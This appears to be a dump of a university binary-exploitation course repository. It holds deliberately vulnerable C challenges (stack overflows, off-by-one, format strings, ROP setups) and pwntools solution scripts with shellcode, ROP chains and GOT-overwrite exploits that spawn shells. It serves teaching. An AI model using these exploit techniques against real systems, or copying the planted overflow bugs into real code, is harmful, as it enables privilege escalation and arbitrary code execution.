ELF('./bof-level6') 7 | 8 | get_a_shell = e.symbols['get_a_shell'] 9 | 10 | 11 | buf = p64(get_a_shell) * (128/8) + p64(0) 12 | with open("exploit.txt", 'wb') as f: 13 | f.write(buf) 14 | 15 | p.sendline(buf) 16 | p.wait() 17 | p.close() 18 | 19 | c = Core('./core') 20 | 21 | addr = c.stack.find(buf) 22 | 23 | print("Address %s" % hex(addr)) 24 | 25 | exploit_buf = p64(get_a_shell) * (128/8) + p64(addr) 26 | 27 | p = process('./bof-level6') 28 | p.sendline(exploit_buf) 29 | p.interactive() 30 | -------------------------------------------------------------------------------- /solutions/week2/bof-level7.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | env = { 6 | 'DUMMY': 'a'*128 7 | } 8 | p = process('./bof-level7', env = env) 9 | 10 | e = ELF('./bof-level7') 11 | 12 | get_a_shell = e.symbols['get_a_shell'] 13 | 14 | buf = p32(get_a_shell) * (136/4) + "\x00" 15 | 16 | p.sendline(buf) 17 | p.wait() 18 | p.close() 19 | 20 | core = Core('./core') 21 | 22 | buffer_address = core.stack.find(buf) 23 | 24 | print(hex(buffer_address)) 25 | 26 | 27 | p = process('./bof-level7', env = env) 28 | buf = p32(get_a_shell) * (136/4) + "\x20" 29 | p.sendline(buf) 30 | 31 | p.interactive() 32 | -------------------------------------------------------------------------------- /solutions/week2/bof-level8.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | env = { 6 | 'DUMMY': 'a'*128 7 | } 8 | p = process('./bof-level8', env = env) 9 | 10 | e = ELF('./bof-level8') 11 | 12 | get_a_shell = e.symbols['get_a_shell'] 13 | 14 | buf = p64(get_a_shell) * (128/8) + "\x00" 15 | 16 | p.sendline(buf) 17 | p.wait() 18 | p.close() 19 | 20 | core = Core('./core') 21 | 22 | buffer_address = core.stack.find(buf) 23 | 24 | print(hex(buffer_address)) 25 | 26 | 27 | p = process('./bof-level8', env = env) 28 | buf = p64(get_a_shell) * (128/8) + "\x40" 29 | p.sendline(buf) 30 | 31 | p.interactive() 32 | -------------------------------------------------------------------------------- /src/week1/challenges/level5/README: -------------------------------------------------------------------------------- 1 | The program will read one integer value, and you need to match 2 | constraints set by the program (length and value). 3 | 4 | Pseudocode of the program 5 | 1. read a string from the user; 6 | 2. get the length of the string; 7 | exit if input length is not matched with a predefined value. 8 | 3. convert the input to an integer and then to a string; 9 | 4. apply xor to the string and compare each byte to the password 10 | exit if any byte of your input is not matched with the password 11 | 12 | 13 | Hint: two's complement https://en.wikipedia.org/wiki/Two%27s_complement 14 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level7/README: -------------------------------------------------------------------------------- 1 | The stack is configured as follows (in receive_input()): 2 | 3 | [ebp+0x4] return address Can't overwrite 4 | [ebp] saved ebp Can overwrite the last 1 byte... 5 | [ebp-0x4] 6 | [ebp-0x8] 7 | ... 8 | ... 9 | ... 10 | [ebp-0x88] buffer 11 | 12 | 13 | The program gets your input upto 137 bytes because the developer made a mistake, 14 | putting '=' in the for loop. Because of this, you can overwrite 15 | the last 1 byte of 'saved ebp' but you can't overwrite other bytes nor 16 | the return address. 17 | 18 | Can you exploit this program to run get_a_shell()? 19 | -------------------------------------------------------------------------------- /src/week3/challenges/LIST: -------------------------------------------------------------------------------- 1 | shellcode-32 - 10 pts 2 | shellcode-64 - 10 pts 3 | shellcode-nonzero-32 - 10 pts 4 | shellcode-nonzero-64 - 10 pts 5 | shellcode-short-32 - 10 pts + 20 extra pts for the shortest shellcode 6 | shellcode-short-64 - 10 pts + 20 extra pts for the shortest shellcode 7 | shellcode-ascii-32 - 20 pts 8 | shellcode-ascii-64 - 20 pts 9 | shellcode-envp-32 - 10 pts 10 | shellcode-argv-64 - 10 pts 11 | shellcode-where - extra-credit 10 pts 12 | shellcode-alphanumeric-32 - extra-credit 50 pts 13 | shellcode-alphanumeric-64 - extra-credit 50 pts 14 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level5/bof-level5.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | void get_a_shell() { 8 | printf("Spawning a privileged shell\n"); 9 | setregid(getegid(), getegid()); 10 | execl("/bin/bash", "bash", NULL); 11 | } 12 | 13 | void receive_input() { 14 | char buf[120]; 15 | read(0, buf, 132); 16 | } 17 | 18 | int run() { 19 | printf("Now the program contains a buffer overflow vulnerability,\n"); 20 | printf("but the vulnerability does not allow us to overwrite the return address...\n"); 21 | printf("Can you exploit this program?\n"); 22 | receive_input(); 23 | } 24 | 25 | int main() { 26 | run(); 27 | } 28 | -------------------------------------------------------------------------------- /src/week3/challenges/shellcode-template/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | @echo "Please run either 'make 32' or 'make 64'" 3 | 4 | 32: shellcode.S 5 | gcc -m32 -c -o shellcode.o $< &&\ 6 | gcc -o shellcode shellcode.o -m32 && \ 7 | objcopy -S -O binary -j .text shellcode.o shellcode.bin 8 | 9 | 64: shellcode.S 10 | gcc -m64 -c -o shellcode.o $< &&\ 11 | gcc -o shellcode shellcode.o -m64 && \ 12 | objcopy -S -O binary -j .text shellcode.o shellcode.bin 13 | 14 | objdump: 15 | @objdump -d shellcode.o 16 | 17 | print: 18 | @python -c "import sys; print repr(sys.stdin.read())" < shellcode.bin 19 | 20 | dump: 21 | @xxd shellcode.bin 22 | 23 | run: 24 | ./shellcode 25 | 26 | clean: 27 | @rm -rf shellcode shellcode.o shellcode.bin 28 | -------------------------------------------------------------------------------- /src/week1/challenges/TEACH: -------------------------------------------------------------------------------- 1 | ltrace - what is library call? - examples: strcmp?! atoi?! 2 | man page - function name! 3 | strace - what is system call? - examples: open, read, write, setreuid, etc. 4 | 5 | I/O 6 | printf 7 | scanf 8 | %d 9 | %u 10 | %x 11 | %ld 12 | %lu 13 | %lx 14 | %llx 15 | %llu 16 | %lld 17 | %s 18 | %f 19 | %g 20 | 21 | local variables - stack. 22 | global variables - from the program - rodata, data, bss, etc. 23 | 24 | Data types 25 | integer: hexadecimal numbers, negative numbers, and endianess. 26 | string: null-terminator 27 | string-related functions 28 | strcmp 29 | strcpy 30 | -------------------------------------------------------------------------------- /src/week2/challenges/TEACH: -------------------------------------------------------------------------------- 1 | ltrace - what is library call? - examples: strcmp?! atoi?! 2 | man page - function name! 3 | strace - what is system call? - examples: open, read, write, setreuid, etc. 4 | 5 | I/O 6 | printf 7 | scanf 8 | %d 9 | %u 10 | %x 11 | %ld 12 | %lu 13 | %lx 14 | %llx 15 | %llu 16 | %lld 17 | %s 18 | %f 19 | %g 20 | 21 | local variables - stack. 22 | global variables - from the program - rodata, data, bss, etc. 23 | 24 | Data types 25 | integer: hexadecimal numbers, negative numbers, and endianess. 26 | string: null-terminator 27 | string-related functions 28 | strcmp 29 | strcpy 30 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level6/bof-level6.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | void get_a_shell() { 8 | printf("Spawning a privileged shell\n"); 9 | setregid(getegid(), getegid()); 10 | execl("/bin/bash", "bash", NULL); 11 | } 12 | 13 | void receive_input() { 14 | char buf[128]; 15 | read(0, buf, 136); 16 | } 17 | 18 | int run() { 19 | char buf[128]; 20 | printf("Now the program contains a buffer overflow vulnerability,\n"); 21 | printf("but the vulnerability does not allow us to overwrite the return address...\n"); 22 | printf("Can you exploit this program?\n"); 23 | receive_input(); 24 | } 25 | 26 | int main() { 27 | run(); 28 | } 29 | -------------------------------------------------------------------------------- /solutions/week5/rop-3-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | 6 | SHELLCODE = 'j2X\xcd\x80P[PYjGX\xcd\x80j\x0bX\x99Rhn/shh//biRYT[\xcd\x80' 7 | 8 | p = process("./rop-3-32") 9 | 10 | addr_mprotect = p.elf.symbols['mprotect'] 11 | 12 | # 0x080485a7 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 13 | ppppr = 0x80485a7 14 | pppr = 0x80485a8 15 | ppr = 0x80485a9 16 | pr = 0x80485aa 17 | 18 | g_buf = 0x804a060 19 | 20 | aligned_g_buf = g_buf & 0xfffff000 21 | 22 | 23 | payload = SHELLCODE + "A" * (0x98 + 4 - len(SHELLCODE)) 24 | 25 | # call mprotect(aligned_g_buf, 0x1000, 7) 26 | # then call g_buf 27 | 28 | payload += p32(addr_mprotect) + p32(g_buf) + p32(aligned_g_buf) + \ 29 | p32(0x1000) + p32(7) 30 | 31 | p.sendline(payload) 32 | 33 | p.interactive() 34 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-use-envp-32/stack-ovfl-use-envp.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #ifndef BUFSIZE 6 | #define BUFSIZE 30 7 | #endif 8 | 9 | #include 10 | 11 | __attribute__((constructor)) 12 | static void set_dumpable() { 13 | prctl(PR_SET_DUMPABLE, 1); 14 | } 15 | 16 | __attribute__((optimize("-O2"))) int input_func(int a) { 17 | // name buffer to overflow 18 | char buf[BUFSIZE]; 19 | printf("Please type your name: \n"); 20 | read(0, buf, 20); 21 | 22 | printf("Hello %s\n!", buf); 23 | 24 | return 0; 25 | } 26 | 27 | int non_main_func(void) { 28 | int a = 0; 29 | return input_func(a); 30 | } 31 | 32 | int main(int argc, char** argv, char** envp) { 33 | non_main_func(); 34 | return 0; 35 | } 36 | -------------------------------------------------------------------------------- /solutions/week7/where-to-jump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | ROP_NOPS = p32(0x804833e) * 1000 6 | 7 | elf = ELF('where-to-jump') 8 | 9 | printf_got = elf.got['printf'] 10 | printf_plt = elf.plt['printf'] 11 | pr = 0x8048355 12 | ppr = 0x80485ba 13 | pppr = 0x80485b9 14 | 15 | rop = ROP_NOPS 16 | rop += p32(printf_plt) 17 | rop += p32(pr) 18 | rop += p32(printf_got) 19 | 20 | print(hex(printf_got)) 21 | print(hex(printf_plt)) 22 | 23 | env = { 24 | 'G' : 'ABC', 25 | 'S' : rop * (70000/len(rop)) 26 | } 27 | 28 | p = process('where-to-jump', env=env) 29 | 30 | gdb.attach(p, "b *target+94\nc") 31 | 32 | #raw_input() 33 | p.recv(timeout=0.2) 34 | p.sendline("804843e") 35 | data = p.recv() 36 | print(repr(data)) 37 | data = p.recv() 38 | print(repr(data)) 39 | 40 | p.interactive() 41 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-6-64/rop-6-64.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | 8 | // Please check the assembly for the correct buffer size 9 | #ifndef BUFSIZE 10 | #define BUFSIZE 128 11 | #endif 12 | 13 | #include 14 | 15 | // for core dump 16 | __attribute__((constructor)) 17 | static void set_dumpable() { 18 | prctl(PR_SET_DUMPABLE, 1); 19 | } 20 | 21 | void null_func() { 22 | execve("", 0, 0); 23 | } 24 | 25 | 26 | void input_func() { 27 | // name buffer to overflow 28 | char buf[BUFSIZE]; 29 | write(1, "Please type your name: \n", 25); 30 | read(0, buf, 4096); 31 | 32 | return; 33 | } 34 | 35 | int main(int argc, char** argv, char** envp) { 36 | char dummy_buffer[4096]; 37 | input_func(); 38 | return 0; 39 | } 40 | -------------------------------------------------------------------------------- /src/week7/challenges/one-format-string/one-format-string.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | void 8 | please_run_this(void) { 9 | setregid(getegid(), getegid()); 10 | execve("/bin/sh", 0, 0); 11 | } 12 | 13 | int max_read_size = 63; 14 | 15 | void target() { 16 | char buf[64]; 17 | int *size = &max_read_size; 18 | printf("Please type your name: \n"); 19 | read(0, buf, *size); 20 | buf[63] = '\0'; 21 | // insecure 22 | printf(buf); 23 | 24 | printf("Please type your affiliation: \n"); 25 | // HINT: can you overfill the buffer with this read? 26 | read(0, buf, *size); 27 | buf[63] = '\0'; 28 | // secure 29 | printf("%s", buf); 30 | } 31 | 32 | int main() { 33 | target(); 34 | } 35 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-no-envp-32/stack-ovfl-no-envp.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 30 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | __attribute__((optimize("-O2"))) int input_func() { 18 | // name buffer to overflow 19 | char buf[BUFSIZE]; 20 | printf("Please type your name: \n"); 21 | read(0, buf, 20); 22 | 23 | printf("Hello %s\n!", buf); 24 | 25 | return 0; 26 | } 27 | 28 | int main(int argc, char** argv, char** envp) { 29 | char **env = envp; 30 | while(*env != NULL) { 31 | memset(*env, 0, strlen(*env)); 32 | ++env; 33 | } 34 | input_func(); 35 | return 0; 36 | } 37 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-sc-32/stack-ovfl-sc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #ifndef BUFSIZE 6 | #define BUFSIZE 30 7 | #endif 8 | 9 | #include 10 | 11 | __attribute__((constructor)) 12 | static void set_dumpable() { 13 | prctl(PR_SET_DUMPABLE, 1); 14 | } 15 | 16 | __attribute__((optimize("-O2"))) int input_func(int a) { 17 | // name buffer to overflow 18 | char buf[BUFSIZE]; 19 | printf("Your buffer is at: %p\n", buf); 20 | printf("Please type your name: \n"); 21 | read(0, buf, BUFSIZE * 2); 22 | 23 | printf("Hello %s\n!", buf); 24 | 25 | return 0; 26 | } 27 | 28 | int non_main_func(void) { 29 | int a = 0; 30 | return input_func(a); 31 | } 32 | 33 | int main(int argc, char** argv, char** envp) { 34 | non_main_func(); 35 | return 0; 36 | } 37 | -------------------------------------------------------------------------------- /solutions/week6/aw-2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | env = { 5 | 'PATH': '.' 6 | } 7 | p = process("./aw-2", env=env) 8 | 9 | printf_got = p.elf.got['printf'] 10 | 11 | print(p.recv()) 12 | p.sendline("8") 13 | 14 | print(p.recv()) 15 | p.sendline(hex(printf_got)) 16 | 17 | data = p.recv() 18 | print(repr(data)) 19 | 20 | printf_addr = u64(data.split('\n')[1][0:8]) 21 | print(hex(printf_addr)) 22 | 23 | """ 24 | pwndbg> print printf 25 | $3 = {} 0x7ffff7a62800 <__printf> 26 | pwndbg> print system 27 | $4 = {} 0x7ffff7a52390 <__libc_system> 28 | """ 29 | 30 | system_addr = printf_addr - 0x7ffff7a62800 + 0x7ffff7a52390 31 | 32 | p.sendline("8") 33 | 34 | print(p.recv()) 35 | p.sendline(hex(printf_got)) 36 | 37 | p.send(p64(system_addr)) 38 | p.interactive() 39 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-where-32-2/stack-ovfl-where.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 30 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | uint32_t eip; 18 | 19 | __attribute__((optimize("-O2"))) int input_func() { 20 | // name buffer to overflow 21 | char buf[BUFSIZE]; 22 | printf("Where do you like to jump? Put a hexadeximal address.. \n"); 23 | uint32_t addr; 24 | scanf("%x", &addr); 25 | ((int(*)())addr)(); 26 | return 0; 27 | } 28 | 29 | int main(int argc, char** argv, char** envp) { 30 | uint32_t end = 0xffffe000; 31 | uint32_t start = &argc; 32 | memset(&argc, 0, end-start); 33 | input_func(); 34 | return 0; 35 | } 36 | -------------------------------------------------------------------------------- /src/week4/challenges/1-dep-2/dep-2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // Please check the assembly for the correct buffer size 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 128 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | __attribute__((optimize("-O2"))) int input_func(int a) { 18 | // name buffer to overflow 19 | char buf[BUFSIZE]; 20 | printf("Please type your name: \n"); 21 | read(0, buf, BUFSIZE * 2); 22 | 23 | printf("Hello %s!\n", buf); 24 | 25 | return 0; 26 | } 27 | 28 | int non_main_func(void) { 29 | int a = 0; 30 | return input_func(a); 31 | } 32 | 33 | int main(int argc, char** argv, char** envp) { 34 | // get permission 35 | setregid(getegid(), getegid()); 36 | non_main_func(); 37 | return 0; 38 | } 39 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-32/rop-2-32.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | // Please check the assembly for the correct buffer size 7 | #ifndef BUFSIZE 8 | #define BUFSIZE 128 9 | #endif 10 | 11 | #include 12 | 13 | __attribute__((constructor)) 14 | static void set_dumpable() { 15 | prctl(PR_SET_DUMPABLE, 1); 16 | } 17 | 18 | 19 | // function placeholder 20 | int some_function() { 21 | open("", 0); 22 | read(0, "", 1); 23 | write(0, "", 1); 24 | exit(-1); 25 | return 0; 26 | } 27 | 28 | void input_func() { 29 | // name buffer to overflow 30 | char buf[BUFSIZE]; 31 | write(1, "Please type your name: \n", 24); 32 | read(0, buf, BUFSIZE * 2); 33 | 34 | printf("Hello %s!\n", buf); 35 | return; 36 | } 37 | 38 | int main(int argc, char** argv, char** envp) { 39 | input_func(); 40 | return 0; 41 | } 42 | -------------------------------------------------------------------------------- /src/week6/challenges/sr-1/sr-1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | // Please check the assembly for the correct buffer size 7 | #ifndef BUFSIZE 8 | #define BUFSIZE 128 9 | #endif 10 | 11 | #include 12 | 13 | __attribute__((constructor)) 14 | static void set_dumpable() { 15 | prctl(PR_SET_DUMPABLE, 1); 16 | } 17 | 18 | int input_func() { 19 | // name buffer to overflow 20 | char buf[BUFSIZE]; 21 | int i; 22 | 23 | printf("I would like to let you have the sequential read capability to\n" 24 | "my current stack. How many bytes of your name do you want to print?\n"); 25 | scanf("%d", &i); 26 | write(1, buf, i); 27 | 28 | printf("Please type your name: \n"); 29 | read(0, buf, BUFSIZE * 2); 30 | 31 | return 0; 32 | } 33 | 34 | int main(int argc, char** argv, char** envp) { 35 | input_func(); 36 | return 0; 37 | } 38 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level7/bof-level7.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | void get_a_shell() { 8 | printf("Spawning a privileged shell\n"); 9 | setregid(getegid(), getegid()); 10 | execl("/bin/bash", "bash", NULL); 11 | } 12 | 13 | char buffer[256]; 14 | int i; 15 | 16 | void receive_input() { 17 | char buf[128]; 18 | fgets(buffer, 256, stdin); 19 | for(i=0; i<=136; ++i) { 20 | buf[i] = buffer[i]; 21 | } 22 | } 23 | 24 | int run() { 25 | printf("Now, the developer of this program is trained a bit more, however,\n"); 26 | printf("still the vulnerability exists in th program: 1-byte overflow in the buffer,\n"); 27 | printf("which is an off-by-one vulnerability!\n"); 28 | printf("Can you exploit this program?\n"); 29 | receive_input(); 30 | } 31 | 32 | int main() { 33 | run(); 34 | } 35 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level8/bof-level8.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | void get_a_shell() { 8 | printf("Spawning a privileged shell\n"); 9 | setregid(getegid(), getegid()); 10 | execl("/bin/bash", "bash", NULL); 11 | } 12 | 13 | char buffer[256]; 14 | int i; 15 | 16 | void receive_input() { 17 | char buf[128]; 18 | fgets(buffer, 256, stdin); 19 | for(i=0; i<=128; ++i) { 20 | buf[i] = buffer[i]; 21 | } 22 | } 23 | 24 | int run() { 25 | char buf[16]; 26 | printf("Now, the developer of this program is trained a bit more, however,\n"); 27 | printf("still the vulnerability exists in th program: 1-byte overflow in the buffer,\n"); 28 | printf("which is an off-by-one vulnerability!\n"); 29 | printf("Can you exploit this program?\n"); 30 | receive_input(); 31 | } 32 | 33 | int main() { 34 | run(); 35 | } 36 | -------------------------------------------------------------------------------- /src/week4/challenges/2-dep-3/dep-3.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | // Please check the assembly for the correct buffer size 7 | #ifndef BUFSIZE 8 | #define BUFSIZE 128 9 | #endif 10 | 11 | #include 12 | 13 | __attribute__((constructor)) 14 | static void set_dumpable() { 15 | prctl(PR_SET_DUMPABLE, 1); 16 | } 17 | 18 | int some_function() { 19 | return open("a.txt", O_RDONLY); 20 | } 21 | 22 | __attribute__((optimize("-O2"))) int input_func(int a) { 23 | // name buffer to overflow 24 | char buf[BUFSIZE]; 25 | write(1, "Please type your name: \n", 24); 26 | read(0, buf, BUFSIZE * 2); 27 | 28 | printf("Hello %s!\n", buf); 29 | 30 | return 0; 31 | } 32 | 33 | int non_main_func(void) { 34 | int a = 0; 35 | return input_func(a); 36 | } 37 | 38 | int main(int argc, char** argv, char** envp) { 39 | non_main_func(); 40 | return 0; 41 | } 42 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-64/rop-2-64.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | // Please check the assembly for the correct buffer size 7 | #ifndef BUFSIZE 8 | #define BUFSIZE 128 9 | #endif 10 | 11 | #include 12 | 13 | __attribute__((constructor)) 14 | static void set_dumpable() { 15 | prctl(PR_SET_DUMPABLE, 1); 16 | } 17 | 18 | 19 | // function placeholder 20 | int some_function() { 21 | open("", 0); 22 | read(0, "", 1); 23 | write(0, "", 1); 24 | 25 | // a free gadget for you. 26 | asm volatile("pop %rdx; ret"); 27 | } 28 | 29 | void input_func() { 30 | // name buffer to overflow 31 | char buf[BUFSIZE]; 32 | write(1, "Please type your name: \n", 24); 33 | read(0, buf, BUFSIZE * 3); 34 | 35 | printf("Hello %s!\n", buf); 36 | return; 37 | } 38 | 39 | int main(int argc, char** argv, char** envp) { 40 | input_func(); 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-no-envp-no-argv-32/stack-ovfl-no-envp-no-argv.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 30 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | __attribute__((optimize("-O2"))) int input_func() { 18 | // name buffer to overflow 19 | char buf[BUFSIZE]; 20 | printf("Please type your name: \n"); 21 | read(0, buf, 20); 22 | 23 | printf("Hello %s\n!", buf); 24 | 25 | return 0; 26 | } 27 | 28 | int main(int argc, char** argv, char** envp) { 29 | char **env = envp; 30 | while(*env != NULL) { 31 | memset(*env, 0, strlen(*env)); 32 | ++env; 33 | } 34 | 35 | char **arg = argv; 36 | while(*arg != NULL) { 37 | memset(*arg, 0, strlen(*arg)); 38 | ++arg; 39 | } 40 | 41 | input_func(); 42 | return 0; 43 | } 44 | -------------------------------------------------------------------------------- /src/week4/challenges/0-dep-1/dep-1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | // Please check the assembly for the correct buffer size 7 | #ifndef BUFSIZE 8 | #define BUFSIZE 128 9 | #endif 10 | 11 | #include 12 | 13 | __attribute__((constructor)) 14 | static void set_dumpable() { 15 | prctl(PR_SET_DUMPABLE, 1); 16 | } 17 | 18 | int some_function() { 19 | system("ls"); 20 | } 21 | 22 | 23 | __attribute__((optimize("-O2"))) int input_func(int a) { 24 | // name buffer to overflow 25 | char buf[BUFSIZE]; 26 | printf("Please type your name: \n"); 27 | 28 | // OVERFLOW!!!!!! 29 | read(0, buf, BUFSIZE * 2); 30 | 31 | printf("Hello %s!\n", buf); 32 | 33 | return 0; 34 | } 35 | 36 | int non_main_func(void) { 37 | int a = 0; 38 | return input_func(a); 39 | } 40 | 41 | int main(int argc, char** argv, char** envp) { 42 | // get permission 43 | setregid(getegid(), getegid()); 44 | non_main_func(); 45 | return 0; 46 | } 47 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-5-32/rop-5-32.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | 8 | // Please check the assembly for the correct buffer size 9 | #ifndef BUFSIZE 10 | #define BUFSIZE 128 11 | #endif 12 | 13 | #include 14 | 15 | // for core dump 16 | __attribute__((constructor)) 17 | static void set_dumpable() { 18 | prctl(PR_SET_DUMPABLE, 1); 19 | } 20 | 21 | char* strcpy(char *a, char *b) { 22 | while(*b) { 23 | *(a++) = *(b++); 24 | } 25 | *a = '\0'; 26 | return a; 27 | } 28 | 29 | void null() { 30 | #ifdef __x86_64__ 31 | asm volatile("pop %rdx"); 32 | #endif 33 | } 34 | 35 | 36 | void input_func() { 37 | // name buffer to overflow 38 | char buf[BUFSIZE]; 39 | puts("Please type your name: "); 40 | read(0, buf, BUFSIZE*4); 41 | 42 | printf("Hello %s!\n", buf); 43 | return; 44 | } 45 | 46 | int main(int argc, char** argv, char** envp) { 47 | 48 | input_func(); 49 | return 0; 50 | } 51 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-5-64/rop-5-64.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | 8 | // Please check the assembly for the correct buffer size 9 | #ifndef BUFSIZE 10 | #define BUFSIZE 128 11 | #endif 12 | 13 | #include 14 | 15 | // for core dump 16 | __attribute__((constructor)) 17 | static void set_dumpable() { 18 | prctl(PR_SET_DUMPABLE, 1); 19 | } 20 | 21 | char* strcpy(char *a, char *b) { 22 | while(*b) { 23 | *(a++) = *(b++); 24 | } 25 | *a = '\0'; 26 | return a; 27 | } 28 | 29 | void null() { 30 | #ifdef __x86_64__ 31 | asm volatile("pop %rdx"); 32 | #endif 33 | } 34 | 35 | 36 | void input_func() { 37 | // name buffer to overflow 38 | char buf[BUFSIZE]; 39 | puts("Please type your name: "); 40 | read(0, buf, BUFSIZE*4); 41 | 42 | printf("Hello %s!\n", buf); 43 | return; 44 | } 45 | 46 | int main(int argc, char** argv, char** envp) { 47 | 48 | input_func(); 49 | return 0; 50 | } 51 | -------------------------------------------------------------------------------- /solutions/week5/rop-3-64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | 6 | SHELLCODE = 'jlX\x0f\x05P_P^jrX\x0f\x05j;X\x99H\xbb//bin/shRSR^T_\x0f\x05' 7 | 8 | p = process("./rop-3-64") 9 | 10 | addr_mprotect = p.elf.symbols['mprotect'] 11 | 12 | g_buf = 0x601080 13 | 14 | aligned_g_buf = g_buf & 0xfffff000 15 | 16 | #0x0000000000400743 : pop rdi ; ret 17 | #0x000000000040064a : pop rdx ; nop ; pop rbp ; ret 18 | #0x0000000000400741 : pop rsi ; pop r15 ; ret 19 | 20 | rdi_ret = 0x400743 21 | rdx_rbp_ret = 0x40064a 22 | rsi_r15_ret = 0x400741 23 | 24 | 25 | payload = SHELLCODE + "A" * (0x80 + 8 - len(SHELLCODE)) 26 | 27 | # call mprotect(aligned_g_buf, 0x1000, 7) 28 | # then call g_buf 29 | 30 | payload += p64(rdi_ret) + p64(aligned_g_buf) + \ 31 | p64(rsi_r15_ret) + p64(0x1000) + p64(0x1000) + \ 32 | p64(rdx_rbp_ret) + p64(7) + p64(7) + \ 33 | p64(addr_mprotect) + \ 34 | p64(g_buf) 35 | 36 | p.sendline(payload) 37 | 38 | p.interactive() 39 | -------------------------------------------------------------------------------- /solutions/week6/fs-code-exec-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | env = { 5 | 'PATH' : '.:/bin:/usr/bin' 6 | } 7 | p = process('fs-code-exec-32', env=env) 8 | 9 | puts_got = p.elf.got['puts'] 10 | printf_got = p.elf.got['printf'] 11 | print(hex(puts_got)) 12 | print(p.recv()) 13 | 14 | p.sendline(p32(puts_got) + "%7$s") 15 | 16 | data = p.recv() 17 | 18 | print(repr(data)) 19 | 20 | libc_puts = data.split(' ')[1][4:8] 21 | 22 | print(hex(u32(libc_puts))) 23 | 24 | #0xf7e62ca0 <_IO_puts> 25 | #0xf7e3dda0 <__libc_system> 26 | 27 | libc_puts = u32(libc_puts) 28 | 29 | libc_system = libc_puts - 0xf7e62ca0 + 0xf7e3dda0 30 | 31 | print(hex(libc_system)) 32 | 33 | first = (libc_system & 0xffff) - 8 34 | second = (libc_system >> 16) - (libc_system & 0xffff) 35 | if second < 0: 36 | second += 0x10000 37 | 38 | buf = p32(printf_got) + p32(printf_got+2) + '%' + ("%05dx" % first) + '%7$n' + '%' + ("%05dx" % second) + '%8$n' 39 | 40 | p.sendline(buf) 41 | p.interactive() 42 | 43 | -------------------------------------------------------------------------------- /src/week1/challenges/level6/test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | def memfrob(string): 4 | ret = '' 5 | for c in string: 6 | ret += chr(ord(c)^42) 7 | return ret 8 | 9 | def add_space(string): 10 | ret = '' 11 | for c in string: 12 | ret += chr((ord(c)+0x20)&0xff) 13 | return ret 14 